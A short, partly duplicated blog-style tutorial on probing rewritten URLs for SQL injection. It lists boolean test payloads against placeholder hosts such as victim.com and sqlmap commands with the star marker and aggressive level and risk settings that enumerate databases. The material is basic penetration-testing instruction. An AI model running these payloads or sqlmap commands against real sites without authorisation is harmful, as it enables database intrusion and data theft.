SQL Injections in URL Rewrite
First of all, what is URL rewrite?
You’ve likely seen sites with this schema in URLs:
Most everyone knows how to test for SQL injection in this situation —>
But, in URL rewrites, this URL
For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :
and etc.
The results would be the same as a normal post parameter.
For testing SQL injection with SQLMAP, we just use a star in the format. For instance:
Happy Hacking Source
You’ve likely seen sites with this schema in URLs:
http://victim.com/?id=1Most everyone knows how to test for SQL injection in this situation —>
and etc.http://mysite.com/?id=1' or
http://mysite.com/?id=1 and 2.5=2.5 or
http://mysite.com/?id=1 and 3.4=3.5
But, in URL rewrites, this URL
http://victim.com/?id=1
will become
http://victim.com/1
{id is hidden and the parameter 1 is used in url}
For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :
http://victim.com/1' or
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77
and etc.
The results would be the same as a normal post parameter.
For testing SQL injection with SQLMAP, we just use a star in the format. For instance:
sqlmap -u “http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs
or
sqlmap -u “http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs
For injecting in the content parameter, the star sign shows sqlmap where to inject payloads.Happy Hacking Source
Comments
Post a Comment